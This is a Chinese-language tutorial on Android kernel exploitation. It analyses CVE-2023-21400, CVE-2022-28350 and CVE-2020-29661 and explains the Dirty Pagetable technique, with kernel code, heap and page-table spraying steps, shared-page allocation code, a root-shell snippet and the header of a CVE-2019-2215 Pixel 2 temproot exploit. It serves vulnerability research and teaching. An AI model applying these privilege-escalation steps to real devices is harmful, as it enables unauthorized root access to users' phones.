Android安全-内核篇

韩乔落

基础知识

启动命令

emulator \
-avd Pixel_API_24 \
-show-kernel \
-verbose \
-wipe-data \
-netfast \
-kernel arch/x86_64/boot/bzImage \
-qemu \
-s

CVE 复现

CVE-2023-21400 - Double Free | DirtyPTE

CVE-2023-21400 是 io_uring 中的 Double-Free 漏洞,影响内核 5.10。

漏洞分析

io_uring中,当我们提交IOSQE_IO_DRAIN请求时,在之前提交的请求完成前,不会启动该请求。因此,该请求会被推迟处理:封装为io_defer_entry对象,添加到io_ring_ctx->defer_list双链表中。

image-20241211175207586

竞争访问1-漏洞对象取出:之前提交的请求完成以后,就会将推迟的请求(io_defer_entry对象)从defer_list中删除。由于defer_list可能被并发访问,所以访问时必须持有自旋锁。但是,存在一种不持有completion_lock自旋锁就访问defer_list的情况:在io_uring中启用了IORING_SETUP_IOPOLL时,可以通过调用 io_uring_enter(IORING_ENTER_GETEVENTS)来获取事件完成情况,所触发的调用链为 io_uring_enter()->io_iopoll_check()->io_iopoll_getevents()->io_do_iopoll()->io_iopoll_complete()->io_commit_cqring()->__io_queue_deferred()

// __io_queue_deferred() —— 从`ctx->defer_list`取出延迟的请求
static void __io_queue_deferred(struct io_ring_ctx *ctx)
{
    do {
        struct io_defer_entry *de = list_first_entry(&ctx->defer_list, // 从`ctx->defer_list`获取`io_defer_entry`对象
                                                     struct io_defer_entry, list);
        if (req_need_defer(de->req, de->seq))
            break;
        list_del_init(&de->list);
        io_req_task_queue(de->req); // 对应的请求将排队等候 task_work_run()
        kfree(de);
    } while (!list_empty(&ctx->defer_list));
}

竞争访问2:以上函数访问ctx->defer_list时没有持有ctx->completion_lock锁,可能导致竞争条件漏洞。因为除了__io_queue_deferred()函数,io_cancel_defer_files()函数也会处理ctx->defer_list。

io_cancel_defer_files()函数有两条触发路径:

  • do_exit()->io_uring_files_cancel()->__io_uring_files_cancel()->io_uring_cancel_task_requests()->io_cancel_defer_files()
  • execve()->do_execve()->do_execveat_common()->bprm_execve()->io_uring_task_cancel()->__io_uring_task_cancel()->__io_uring_files_cancel()->io_uring_cancel_task_requests()->io_cancel_defer_files() —— 这种方式不需要退出当前任务,因此更加可控。可选择这种方式来触发。
static void io_cancel_defer_files(struct io_ring_ctx *ctx,
                                  struct task_struct *task,
                                  struct files_struct *files)
{
    struct io_defer_entry *de = NULL;
    LIST_HEAD(list);

    spin_lock_irq(&ctx->completion_lock);
    list_for_each_entry_reverse(de, &ctx->defer_list, list) {
        if (io_match_task(de->req, task, files)) {
            list_cut_position(&list, &ctx->defer_list, &de->list);
            break;
        }
    }
    spin_unlock_irq(&ctx->completion_lock);

    while (!list_empty(&list)) {
        de = list_first_entry(&list, struct io_defer_entry, list);
        list_del_init(&de->list);
        req_set_fail_links(de->req);
        io_put_req(de->req);
        io_req_complete(de->req, -ECANCELED);
        kfree(de);
    }
}

构造竞争:通过以下代码来构造竞争,同时处理ctx->defer_list

race_0

改进条件竞争:竞争条件一般会触发内存损坏,但本例要复杂一些。通常,io_cancel_defer_files()只处理当前任务创建的io_ring_ctx的延迟列表defer_list,因此exec任务中的io_cancel_defer_files()不会处理iopoll任务中的同一延迟列表。但有一个例外:如果我们在exec任务中向iopoll任务的io_ring_ctx提交IOSQE_IO_DRAIN请求,就可以让exec任务进程中的io_cancel_defer_files()处理该io_ring_ctx的延迟队列。新的条件竞争如下:

race_1

在这种情况下,当exec任务和iopoll任务同时处理defer_list时,会触发内存损坏。

触发漏洞

由于无法控制io_cancel_defer_files()和__io_queue_deferred()何时被触发,可通过重复执行exec任务和iopoll任务来碰撞竞争窗口,如下所示:

race_2

两种崩溃情况

  • (1)由无效list造成。io_cancel_defer_files()和__io_queue_deferred()会竞争遍历ctx->defer_list并从中移除对象,因此ctx->defer_list可能会失效,触发__list_del_entry_valid()检查导致内核崩溃。这种情况无法利用。
  • (2)由Double-Free造成。情况如下:

double_free

尝试

Android内核5.10中,io_defer_entry漏洞对象位于kmalloc-128,触发Double-Free的步骤如下:

(1)在第1次 kfree() 之前:

image-20241211184610925

(2)在第1次 kfree() 之后:

image-20241211184738724

(3)第2次 kfree() 之后:

image-20241211184803687

(4)如上所示,slab进入了非法状态:freelist和next object都指向同一空闲对象。理想情况下,我们可以从slab中分配对象两次,从而控制slab的freelist。首先,从slab中分配出一个内容可控的对象:

image-20241211185135323

(5)可见,由于分配的对象内容可控,可以让next object指向我们可控的任何虚拟地址。接着,再次从slab中分配一个对象,slab如下所示:

image-20241211185210791

让freelist指向我们可控的虚拟地址,就能轻松提权。问题是Android内核开启了CONFIG_SLAB_FREELIST_HARDENED,会混淆next object指针,由于freelist不可控而导致内核崩溃。

可利用性

目标:将Double-Free转化为UAF

UAF_1

(1)挑战 1 - 竞争窗口过小:难以在两次释放io_defer_entry之间堆喷占用空闲对象

(2)挑战 2 - 重复触发Double-Free会降低可利用性

重复速度越快,Double-Free触发得越快。在测试时,可通过添加调试代码来增大两次kfree()之间的时间窗口。

(3)解决挑战1:

UAF_0

问题是,增大了竞争窗口,能够解决挑战1,但是使得重复速度变慢,很难触发Double-Free漏洞了。增大竞争窗口和提高重复速率相矛盾了。

(4)解决挑战 2 - 通过增大ctx->defer_list双链表的长度,增大iopoll任务的遍历时间,以控制竞争点的时序

首先,作者发现ctx->defer_list可以是很长的list,因为io_uring不限制ctx->defer_list中io_defer_entry对象的个数。其次,生成io_defer_entry对象很容易。根据 io_uring 文档,我们既可以生成与启用REQ_F_IO_DRAIN的请求相关联的io_defer_entry对象,也可以生成与未启用REQ_F_IO_DRAIN的请求相关联的io_defer_entry对象。

IOSQE_IO_DRAIN
When this flag is specified, the SQE will not be started before previously
submitted SQEs have completed, and new SQEs will not be started before this one
completes. Available since 5.2.
当指定此标志时,SQE将不会在之前提交的SQE完成之前开始处理,新的SQE也不会在这个SQE完成之前开始。5.2开始可用

以下代码用于生成100万个io_defer_entry对象,每个对象都与一个未启用 REQ_F_IO_DRAIN 的请求相关联:

iopoll  Task
(cpu A)

A1. create a `io_ring_ctx` with IORING_SETUP_IOPOLL enabled by io_uring_setup();

A2: 提交 IORING_OP_READ 请求来读取 ext4 文件系统的文件;

A3. 在启用 REQ_F_IO_DRAIN 的情况下提交请求; // 触发生成`io_defer_entry`对象,因为还没有获取到之前的请求的CQE

A4. for (i = 0; i < 1000000; i++) {
在禁用 REQ_F_IO_DRAIN 的情况下提交请求; // 触发生成`io_defer_entry`对象,和未启用REQ_F_IO_DRAIN的请求相关联
}

由于我们能够生成非常多与未启用REQ_F_IO_DRAIN的请求相关联的io_defer_entry,可以使 __io_queue_deferred() 遍历ctx->defer_list很长一段时间。这样能让__io_queue_deferred()执行数秒钟,从而在此期间准确地触发io_cancel_defer_files(),稳定触发Double-Free。

(5)解决挑战 1 - 利用两次kfree()之间的代码来增大竞争窗口

现在不需要使用重复策略来触发Double-Free了,可以任意扩大 kfree() 时间窗。可惜Jann Horn[1]、Yoochan Lee、Byoungyoung Lee、Chanwoo Min[2]提出的方法都不适用。那么 io_cancel_defer_files() 中是否有些代码可以帮助增大时间窗口呢?

作者发现,io_cancel_defer_files()第2次调用kfree()之前有很多唤醒操作,例如,会调用 io_req_complete() -> io_cqring_ev_posted()

static void io_cqring_ev_posted(struct io_ring_ctx *ctx)
{
    if (wq_has_sleeper(&ctx->cq_wait)) {
        wake_up_interruptible(&ctx->cq_wait); //<------------------------ wakeup the waiter (1)
        kill_fasync(&ctx->cq_fasync, SIGIO, POLL_IN);
    }
    if (waitqueue_active(&ctx->wait))
        wake_up(&ctx->wait); //<------------------------ wakeup the waiter (2)
    if (ctx->sq_data && waitqueue_active(&ctx->sq_data->wait))
        wake_up(&ctx->sq_data->wait); //<------------------------ wakeup the waiter (3)
    if (io_should_trigger_evfd(ctx))
        eventfd_signal(ctx->cq_ev_fd, 1); //<------------------------ wakeup the waiter (4)
}

exec任务有4个地方会唤醒其他任务来运行,可利用第1个来扩大时间窗口。**对 io_uring fd调用epoll_wait(),就能在ctx->cq_wait上设置一个waiter;还需要另一个epoll任务来执行epoll_wait(),这样epoll任务就能在调用wake_up_interruptible()时抢占CPU,从而在第2次调用kfree()之前暂停 io_cancel_defer_files()**。问题是,如果很快就重新执行exec任务,时间窗还是很小。解决办法是采用 Jann Horn[1] 提到的调度器策略,成功将 kfree() 窗口增大数秒。

触发Double-Free并转化为UAF的流程如下:

image-20241212103611498

提权

创建signalfd_ctx受害者对象

signalfd_ctx分配:调用signalfd()就会从 kmalloc-128 分配signalfd_ctx对象。

static int do_signalfd4(int ufd, sigset_t *mask, int flags)
{
    struct signalfd_ctx *ctx;
    ......
    sigdelsetmask(mask, sigmask(SIGKILL) | sigmask(SIGSTOP)); // mask 值的 bit 18 和 bit 8 会被置为 1
    signotset(mask);

    if (ufd == -1) {
        ctx = kmalloc(sizeof(*ctx), GFP_KERNEL); //<----------- 分配`signalfd_ctx`对象
        if (!ctx)
            return -ENOMEM;

        ctx->sigmask = *mask;

        /*
         * When we call this, the initialization must be complete, since
         * anon_inode_getfd() will install the fd.
         */
        ufd = anon_inode_getfd("[signalfd]", &signalfd_fops, ctx,
                               O_RDWR | (flags & (O_CLOEXEC | O_NONBLOCK)));
        if (ufd < 0)
            kfree(ctx);
    } else {
        struct fd f = fdget(ufd);
        if (!f.file)
            return -EBADF;
        ctx = f.file->private_data;
        if (f.file->f_op != &signalfd_fops) {
            fdput(f);
            return -EINVAL;
        }
        spin_lock_irq(&current->sighand->siglock);
        ctx->sigmask = *mask; // <---- 对 signalfd_ctx->sigmask 进行有限制的写操作
        spin_unlock_irq(&current->sighand->siglock);

        wake_up(&current->sighand->signalfd_wqh);
        fdput(f);
    }

    return ufd;
}

signalfd_ctx读写操作:如上所示,在堆喷后会往signalfd_ctx开头写入8字节,但不影响利用。除了有限制的写操作,还可以通过show_fdinfo接口(procfs导出)读取signalfd_ctx的前8字节。

static void signalfd_show_fdinfo(struct seq_file *m, struct file *f)
{
    struct signalfd_ctx *ctx = f->private_data;
    sigset_t sigmask;

    sigmask = ctx->sigmask;
    signotset(&sigmask);
    render_sigset_t(m, "sigmask:\t", &sigmask); // 读取`signalfd_ctx`的前8字节
}

**堆喷signalfd_ctx**:在两次kfree()之间,堆喷16000个signalfd_ctx对象来占用释放的io_defer_entry对象。如果成功占据,那么第2次kfree()就会释放这个signalfd_ctx对象,我们将其称为受害者signalfd_ctx对象。

定位受害者signalfd_ctx 对象

思路:堆喷seq_operations对象是为了确定哪一个signalfd_ctx 对象被释放了,也即受害者signalfd_ctx 对象对应的fd,便于后面利用该fd篡改PTE。

第2次kfree()后堆喷16000个seq_operations对象,可调用single_open()来分配(打开/proc/self/status或其他procfs文件可触发single_open())。

int single_open(struct file *file, int (*show)(struct seq_file *, void *),
                void *data)
{
    struct seq_operations *op = kmalloc(sizeof(*op), GFP_KERNEL_ACCOUNT); // allocate seq_operations object
    int res = -ENOMEM;

    if (op) {
        op->start = single_start;
        op->next = single_next;
        op->stop = single_stop;
        op->show = show;
        res = seq_open(file, op);
        if (!res)
            ((struct seq_file *)file->private_data)->private = data;
        else
            kfree(op);
    }
    return res;
}

如果堆喷的seq_operations对象占据了某个释放的signalfd_ctx对象,如下所示:

image-20241212105009300

方法:通过读取所有信号fd的fdinfo,如果某个fd的fdinfo与初始值不同,说明其前8字节被覆盖成了seq_operations对象的内核地址,该fd即与受害者signalfd_ctx对象相关联。这样就定位到了受害者signalfd_ctx对象。

回收受害者signalfd_ctx 对象所在的slab

方法:关闭所有信号fd和/proc/self/status fd,除了受害者signalfd_ctx 对象对应的fd,这样受害者signalfd_ctx对象所在的slab变空,会被页分配器所回收。

用户页表占据受害者slab

目标:堆喷用户页表来占据受害者slab,并定位受害者signalfd_ctx对象的位置。

由于kmalloc-128 slab使用的是1-page,且用户页表也是1-page,这样可以堆喷用户页表来占据受害者slab。如果成功则如下图所示:

image-20241212110909838

可见,通过写入受害者signalfd_ctx对象的前8字节,可以控制用户页表的某个PTE。将PTE的物理地址设置为内核text/data的物理地址,就能修改内核text/data数据。

页表喷射步骤如下:

(1)调用mmap()在虚拟地址空间中创建一块大内存区域

内存区域大小:因为每个末级页表描述了2M的虚拟内存(512*4096),所以如果要喷射512个用户页表,必须调用 mmap() 创建512*2M大小的内存区域。

内存区域计算 —— 内存区域大小 = 页表数量 * 2MiB

起始虚拟地址:起始虚拟地址需与2M(0x200000)对齐。原因是,现在我们只能控制signalfd_ctx的前8字节,并且不知道受害者signalfd_ctx对象在slab中具体位置,可能位于中间。0x200000对齐的起始虚拟地址能确保该地址对应的PTE位于页表的前8个字节。这样在第3步之后页表将如下所示:

image-20241212112730734

(2)页表分配

分配方法:上一步已经创建了内存区域,现在可以从起始虚拟地址开始每隔0x200000字节执行一次写操作,确保内存区域对应的所有用户页表都被分配。即可堆喷用户页表。

unsigned char *addr = (unsigned char *)start_virtual_address;
for (unsigned int i = 0; i < size_of_memory_region; i += 0x200000) {
    *(addr + i) = 0xaa;
}

(3)在页表中定位受害者signalfd_ctx对象

在第2步以后,我们只能确保每个页表的第1个PTE有效。因为受害者signalfd_ctx对象可以位于页表中与128对齐的任何偏移处,所以必须验证页表中所有与128对齐偏移处的PTE。因此,我们从起始虚拟地址开始,每隔16K字节进行一次写操作(对象大小为128字节,每个page含有32个signalfd_ctx对象;准确的步长应为 128 / 8 * 4096 = 64K,即16个page,16K偏小,但同样能覆盖所有目标PTE)。最终的页表如上图所示。

定位方法:通过读取受害者信号fd的fdinfo,可以泄露受害者signalfd_ctx对象的前8个字节。如果能成功读取一个有效的PTE值,说明成功地用用户页表占据了受害者slab。否则,munmap() 该区域,重新映射更大的内存,重复步骤(1)~(3)。

patch内核并提权

现在可通过受害者signalfd_ctx对象控制PTE,下面通过将PTE的物理地址设置为内核text/data地址,patch内核并提权。

(1)定位PTE对应的用户虚拟地址

目的:虽然现在可以控制用户页表的一个PTE,但是还不知道该PTE对应的用户虚拟地址。只有知道了该PTE对应的虚拟地址,才能通过写入该用户虚拟地址来patch内核的text/data

方法:为了定位该PTE对应的用户虚拟地址,需将该PTE的物理地址修改为其他物理地址。然后遍历之前映射的所有虚拟地址,检查是否有一个虚拟地址上的值不是之前设置的初始值(0xaa)。如果找到这样一个虚拟地址,则说明就是PTE对应的虚拟地址。

image-20241212114500993

写限制:受害者signalfd_ctx对象的写入能力有限(写入值的bit 18和bit 8被设置为1),无法对内核任意地址进行patch。一个普通PTE的值形如0xe800098952ff43,其bit 8总是为1,但bit 18落在PTE的物理地址位中,所以只能对bit 18为1的物理地址进行patch。

该限制是由do_signalfd4()中的sigdelsetmask(mask, sigmask(SIGKILL) | sigmask(SIGSTOP));语句所导致,是否可以对该语句打patch呢?

static int do_signalfd4(int ufd, sigset_t *mask, int flags)
{
    struct signalfd_ctx *ctx;
    ......
    sigdelsetmask(mask, sigmask(SIGKILL) | sigmask(SIGSTOP)); // 将mask中的bit 18和bit 8设置为1
    signotset(mask);

    if (ufd == -1) {
        ......
    } else {
        struct fd f = fdget(ufd);
        if (!f.file)
            return -EBADF;
        ctx = f.file->private_data;
        if (f.file->f_op != &signalfd_fops) {
            fdput(f);
            return -EINVAL;
        }
        spin_lock_irq(&current->sighand->siglock);
        ctx->sigmask = *mask; // <----- 对signalfd_ctx进行有限制的写操作
        spin_unlock_irq(&current->sighand->siglock);

        wake_up(&current->sighand->signalfd_wqh);
        fdput(f);
    }

    return ufd;
}

do_signalfd4()的物理地址的 bit 18 恰好为1,因此可patch sigdelsetmask(mask, sigmask(SIGKILL) | sigmask(SIGSTOP)); 语句。如何找到内核某函数的物理地址?

(3)对内核打补丁

目标是对selinux_state、setresuid()/setresgid()等打补丁,以在 Google Pixel 7 上提权。由于只有一个PTE可控,所以需要多次修改PTE的物理地址。

(4)调用setresuid()setresgid()提权

if (setresuid(0, 0, 0) < 0) {
    perror("setresuid");
} else {
    if (setresgid(0, 0, 0) < 0) {
        perror("setresgid");
    } else {
        printf("[+] Spawn a root shell\n");
        system("/system/bin/sh");
    }
}

最终在Google Pixel 7上成功提权:

pic13_pixel7_root

CVE-2022-28350 - file UAF | DirtyPTE

file UAF现有利用方法

file UAF漏洞最近比较流行,主要有3种利用方法:

  • (1)获取已释放的受害者file对象,供新打开的特权文件重用,例如/etc/crontab,之后就能写入特权文件提权。Jann Horn[1]、Mathias Krause[5]、Zhenpeng Lin[6]和作者[7]用到了本方法。缺点有3个,一是在新内核上必须赢得竞争,有一定技巧性和概率性;二是Android上无法写入高权限文件,因为这些文件位于只读文件系统中;三是无法逃逸容器。
  • (2)攻击系统库或可执行文件的页缓存, Xingyu Jin、Christian Resell、Clement Lecigne、Richard Neal[8] 和 Mathias Krause[9]用到了本方法。利用该方法可向libc.so等系统库中注入恶意代码,当特权进程执行libc.so时将以特权用户的身份执行恶意代码,利用结果类似于DirtyPipe。优点是不需要竞争,稳定性较好,但是要想在Android上完整提权或逃逸容器还很复杂,且不适用于其他类型的UAF漏洞。
  • (3)Cross-cache 利用。Yong Wang[10] 和 Maddie Stone[11] 都用到了本方法。提权之前都需要绕过KASLR,Yong Wang[10] 通过重复使用 syscall 代码来猜测 kslides 绕过了KASLR,Maddie Stone[11] 通过另一个信息泄露漏洞绕过了KASLR。绕过KASLR之后,他们伪造了一个file对象来构造内核读写原语。缺点是需要绕过KASLR。

脏页表方法利用file UAF

以CVE-2022-28350和内核版本为5.10的Android为例,介绍Dirty Pagetable的工作原理。

介绍:位于ARM Mali GPU驱动中的 file UAF 漏洞,影响Android 12 和 Android 13。漏洞原因如下。

static int kbase_kcpu_fence_signal_prepare(...) {
    ...
    /* create a sync_file fd representing the fence */
    sync_file = sync_file_create(fence_out); //<------ 创建 file 对象
    if (!sync_file) {
        ...
        ret = -ENOMEM;
        goto file_create_fail;
    }

    fd = get_unused_fd_flags(O_CLOEXEC); //<------ 获取未使用的 fd
    if (fd < 0) {
        ret = fd;
        goto fd_flags_fail;
    }

    fd_install(fd, sync_file->file); //<------ 将 file 对象和 fd 关联起来

    fence.basep.fd = fd;
    ...
    if (copy_to_user(u64_to_user_ptr(fence_info->fence), &fence,
                     sizeof(fence))) {
        ret = -EFAULT;
        goto fd_flags_fail; //<------ 进入本分支
    }

    return 0;

fd_flags_fail:
    fput(sync_file->file); //<------ 释放 file 对象
file_create_fail:
    dma_fence_put(fence_out);

    return ret;
}

可见,调用 fd_install() 将 file 对象与 fd 关联起来,再通过copy_to_user()将fd传递到用户空间。但如果拷贝失败,将释放 file 对象,导致一个有效的fd与已释放的file对象相关联:

image-20241212141229425

回收受害者slab

释放受害者slab上所有对象后,页分配器会回收该slab。

用户页表占据受害者slab

Android上 filp slab的大小是2-page,而用户页表大小是1-page。虽然二者大小不同,但是堆喷用户页表来占用受害者slab的成功率几乎是100%,占用成功后内存布局如下:

image-20241212152733071

递增原语+定位受害者PTE对应的虚拟用户地址

递增原语:目的是构造写原语来篡改PTE。受害者file对象已被用户页表覆盖,对该file对象的多数操作可能导致内核崩溃。但作者发现,调用 dup() 将file对象的f_count递增1,不会触发崩溃。问题是 dup() 会消耗fd资源,单个进程最多打开32768个fd,所以f_count最多递增32768。作者又发现fork()+dup()可突破该限制:先调用fork(),将受害者file对象的f_count加1,然后在子进程中通过dup()再将f_count增加32768。由于可以多次重复fork()+dup(),即可突破限制。

PTE与f_count重叠:下一步是让受害者PTE的位置与f_count重合,这样就能利用递增原语来控制PTE。

file对象的对齐大小为320字节,f_count的偏移是56,占8字节。

(gdb) ptype /o struct file
/* offset |  size */  type = struct file {
/*      0 |    16 */      union {
/*             8 */           struct llist_node {
/*      0 |     8 */              struct llist_node *next;
                                  /* total size (bytes):  8 */
                              } fu_llist;
/*            16 */           struct callback_head {
/*      0 |     8 */              struct callback_head *next;
/*      8 |     8 */              void (*func)(struct callback_head *);
                                  /* total size (bytes): 16 */
                              } fu_rcuhead;
                              /* total size (bytes): 16 */
                          } f_u;
/*     16 |    16 */      struct path {
/*     16 |     8 */          struct vfsmount *mnt;
/*     24 |     8 */          struct dentry *dentry;
                              /* total size (bytes): 16 */
                          } f_path;
/*     32 |     8 */      struct inode *f_inode;
/*     40 |     8 */      const struct file_operations *f_op;
/*     48 |     4 */      spinlock_t f_lock;
/*     52 |     4 */      enum rw_hint f_write_hint;
/*     56 |     8 */      atomic_long_t f_count;
/*     64 |     4 */      unsigned int f_flags;
......
......
/*    288 |     8 */      u64 android_oem_data1;

                          /* total size (bytes): 296 */
                      }

filp cache的slab大小为2-page,一个filp cache的slab中有25个file对象,slab的结构如下所示:

image-20241212154726436

由于受害者file对象有25个可能的位置,为确保受害者file对象的f_count和受害者PTE恰好重合,需准备如下用户页表:

image-20241212155128279

识别PTE对应的用户虚拟地址:现在我们能使受害者file对象的f_count与一个有效的PTE重合了,这个有效的PTE就是受害者PTE。如何找到受害者PTE对应的用户虚拟地址呢?可利用递增原语。

在利用递增原语之前,页表和相应的用户虚拟地址应该如下所示:可以看到,为了区分每个用户虚拟地址对应的物理页,作者将虚拟地址写在每个物理页的前8字节,作为标记。由于用户虚拟地址对应的所有物理页都是一次性分配的,因此它们的物理地址很可能是连续的。

image-20241212160223196

如果我们利用递增原语将受害者PTE增加0x1000,就会改变与受害者PTE对应的物理页,如下所示:受害者PTE和另一个有效的PTE对应同一个物理页!现在可遍历所有虚拟页,检查前8字节是不是其虚拟地址,若不是,则该虚拟页就是受害者PTE对应的虚拟页。

image-20241212161417467

堆喷占用页表

问题:现在找到了受害者PTE,且有递增原语。可将受害者PTE对应的物理地址设置为内核text/data的物理地址,但是mmap() 分配的内存对应的物理地址大于内核text/data的物理地址,而且递增原语有限,无法溢出受害者PTE。解决办法是使PTE指向某个用户页表,通过间接篡改用户页表,来篡改物理内存

策略 1:现在已经让受害者PTE和另一有效PTE指向同一物理页,那么如果我们调用munmap()解除另一有效PTE的虚拟页映射,并触发物理页的释放,会发生什么?page UAF!再用用户页表占据释放页,就能控制用户页表。但问题是,很难堆喷用户页表来占据释放页。原因是,匿名 mmap() 分配的物理页来自内存区的MIGRATE_MOVABLE free_area,而用户页表是从内存区的MIGRATE_UNMOVABLE free_area分配,所以很难通过递增PTE使之指向另一用户页表。参考[10]解释了这一点。

策略 2:新策略能够捕获用户页表,步骤如下。本质是采用另一种方式来分配物理页,使该物理页和用户页表来自同一内存区域,这样如果受害者PTE指向该物理页,就能通过递增该PTE,使该PTE指向某个用户页表

(1)对共享页和用户页表进行 heap shaping

目的:由于共享页和用户页表位于同一种内存,可将共享页嵌入到众多用户页表当中。

共享物理页:通常,内核空间和用户空间需要共享一些物理页,从两个空间都能访问到。有些组件可用于分配这些共享页,例如 dma-buf heaps, io_uring, GPUs 等。

分配共享物理页:作者选用 dma-buf 系统堆来分配共享页,因为可以从Android中不受信任的APP来访问/dev/dma_heap/system,并且 dma-buf 的实现相对简单。通过 open(/dev/dma_heap/system) 可获得一个 dma heap fd,然后用以下代码分配一个共享页:

struct dma_heap_allocation_data data;

data.len = 0x1000;
data.fd_flags = O_RDWR;
data.heap_flags = 0;
data.fd = 0;

if (ioctl(dma_heap_fd, DMA_HEAP_IOCTL_ALLOC, &data) < 0) {
    perror("DMA_HEAP_IOCTL_ALLOC");
    return -1;
}
int dma_buf_fd = data.fd;

由用户空间中的 dma_buf fd来表示一个共享页,可通过mmap() dma_buf fd 将共享页映射到用户空间。从 dma-buf 系统堆分配的共享页本质上是从页分配器分配的(实际上 dma-buf 子系统采用了页面池进行优化,对于本利用没有影响)。用于分配共享页的 gfp_flags 如下所示:

/* HIGH_ORDER_GFP 用于 order-8 和 order-4 page */
#define HIGH_ORDER_GFP  (((GFP_HIGHUSER | __GFP_ZERO | __GFP_NOWARN \
                           | __GFP_NORETRY) & ~__GFP_RECLAIM) \
                         | __GFP_COMP)
/* LOW_ORDER_GFP 用于 order-0 page */
#define LOW_ORDER_GFP (GFP_HIGHUSER | __GFP_ZERO | __GFP_COMP)
static gfp_t order_flags[] = {HIGH_ORDER_GFP, HIGH_ORDER_GFP, LOW_ORDER_GFP};

共享页分配vs页表分配:从LOW_ORDER_GFP可以看出,单个共享页是从内存的MIGRATE_UNMOVABLE free_area中分配的,和页表分配的出处一样。且单个共享页为order-1 (order-0 ?),和页表的order相同。结论是,单个共享页和页表都是从同一migrate free_cache中分配,且order相同

通过以下步骤,就能获得下图中单个共享页和用户页表的布局:

step1:分配3200个用户页表
step2:使用dma-buf系统堆分配单个共享页面
step3:分配3200个用户页表

image-20241213101331895

(2)取消与受害者 PTE 对应的虚拟地址的映射,并将共享页映射到该虚拟地址

目标:由于共享页和页表位于同种内存,所以需要将受害者PTE从原先的物理页映射到共享物理页。

方法:可通过mmap() dma_buf fd 将共享页映射到用户空间,因此可先munmap() 受害者PTE对应的虚拟地址,然后将单个共享页映射到该虚拟地址。如下图所示:

image-20241213115619059

(3)利用递增原语捕获用户页表

现在,我们利用递增原语对受害者PTE增加0x1000、0x2000、0x3000,有很大机率使受害者PTE对应到另一用户页表。如下图所示:

image-20241213115657335

现在已经控制了一个用户页表。通过修改用户页表中的PTE,就能修改内核 text/data,即可提权:

pic23_file_uaf_root

CVE-2020-29661 - pid UAF | DirtyPTE

介绍:CVE-2020-29661属于pid UAF漏洞,已被Jann Horn[12]和Yong Wang[10]利用。Jann Horn在Debian上通过控制用户页表来修改只读文件(例如,setuid二进制文件)的页缓存,缺点是无法逃逸容器,且不能绕过Android上的SELinux防护。

作者采用Dirty Pagetable的方法重新利用了CVE-2020-29661,能在内核为4.14的Google Pixel 4上提权。pid UAF 和 file UAF 都使用类似的递增原语来操作 PTE。以下只介绍关键步骤。

脏页表方法利用CVE-2020-29661

与file UAF类似,在触发CVE-2020-29661并释放受害者slab中的所有其他pid对象后,用用户页表占用受害者slab。如下图所示,受害者pid对象位于用户页表中:

image-20241213120838440

利用pid UAF构造递增原语

目标:利用递增原语篡改受害者PTE。

选取受害者pid对象的count成员与有效PTE重合,count位于pid对象的前4字节(8字节对齐):

struct pid
{
    refcount_t count; //<------------- 4 bytes, aligned with 8
    unsigned int level;
    spinlock_t lock;
    /* lists of tasks that use this pid */
    struct hlist_head tasks[PIDTYPE_MAX];
    struct hlist_head inodes;
    /* wait queue for pidfd notifications */
    wait_queue_head_t wait_pidfd;
    struct rcu_head rcu;
    struct upid numbers[1];
};

尽管 count 字段只有4字节,但它与PTE的低4字节重合。Jann Horn[12] 之前基于 count 构造了递增原语,其限制同样来自fd资源有限,可通过 fork() 在多个进程中执行递增原语来突破限制。

分配共享页

内核4.14中没有 dma-buf heaps,可通过ION来分配共享页。ION更加方便,因为可通过设置ION的flag直接从页分配器分配共享页。分配代码如下:

#if LEGACY_ION
int alloc_pages_from_ion(int num) {
    struct ion_allocation_data data;
    memset(&data, 0, sizeof(data));

    data.heap_id_mask = 1 << ION_SYSTEM_HEAP_ID;
    data.len = 0x1000 * num;
    data.flags = ION_FLAG_POOL_FORCE_ALLOC;
    if (ioctl(ion_fd, ION_IOC_ALLOC, &data) < 0) {
        perror("ioctl");
        return -1;
    };

    struct ion_fd_data fd_data;
    fd_data.handle = data.handle;
    if (ioctl(ion_fd, ION_IOC_MAP, &fd_data) < 0) {
        perror("ioctl");
        return -1;
    }
    int dma_buf_fd = fd_data.fd;
    return dma_buf_fd;
}
#else
int alloc_pages_from_ion(int num) {
    struct ion_allocation_data data;
    memset(&data, 0, sizeof(data));

    data.heap_id_mask = 1 << ION_SYSTEM_HEAP_ID;
    data.len = 0x1000 * num;
    data.flags = ION_FLAG_POOL_FORCE_ALLOC;
    if (ioctl(ion_fd, ION_IOC_ALLOC, &data) < 0) {
        perror("ioctl");
        return -1;
    }

    int dma_buf_fd = data.fd;

    return dma_buf_fd;
}
#endif

共享页由用户空间中的dma_buf_fd 表示,可通过 mmap() dma_buf_fd 将共享页映射到用户空间。

Google Pixel 4提权

成功提权:

pic25_root_pixel4

CVE-2019-2215 - Binder UAF

exploit

/*
* cve-2019-2215.c: Temproot for Pixel 2 and Pixel 2 XL via CVE-2019-2215
*
* Based on proof-of-concept by Jann Horn & Maddie Stone of Google Project Zero.
* cf. https://bugs.chromium.org/p/project-zero/issues/detail?id=1942
*
* Description: Demonstration of a kernel memory R/W-only privilege escalation
* attack resulting in a temporary root shell.
*
* Works on Google Pixel 2/Pixel 2 XL (walleye/taimen) devices
* running the QP1A.190711.020 image with kernel version-BuildID
* 4.4.177-g83bee1dc48e8. For this tool to work on other devices or
* kernels affected by the same vulnerability, some offsets need to
* be found and changed.
*
* Also includes a mini debug console from which it is possible to
* explore and modify kernel memory, as well as spawn a shell. Odd!
*
* Usage: Compile for AArch64 and run; all the source is in a single file on
* purpose. Tested with the cross-compiler toolchain in Android NDK r20.
*
* Pass 'debug' as the sole cmdline argument to start the mini debug
* console instead of the privesc routine after kernel R/W is achieved.
*
* Sample output:
*
* taimen:/ $ cd /data/local/tmp
* taimen:/data/local/tmp $ install -m 755 /sdcard/cve-2019-2215 ./
* taimen:/data/local/tmp $ ./cve-2019-2215
* Temproot for Pixel 2 and Pixel 2 XL via CVE-2019-2215
* [+] startup
* [+] find kernel address of current task_struct
* [+] obtain arbitrary kernel memory R/W
* [+] find kernel base address
* [+] bypass SELinux and patch current credentials
* taimen:/data/local/tmp # id
* uid=0(root) gid=0(root) groups=0(root),1004(input),1007(log),1011(adb),
* 1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),
* 3006(net_bw_stats),3009(readproc),3011(uhid) context=u:r:kernel:s0
* taimen:/data/local/tmp # getenforce
* Permissive
* taimen:/data/local/tmp # exit
* taimen:/data/local/tmp $
*
* <-- snip -->
*
* taimen:/data/local/tmp $ ./cve-2019-2215 debug
* Temproot for Pixel 2 and Pixel 2 XL via CVE-2019-2215
* [+] startup
* [+] find kernel address of current task_struct
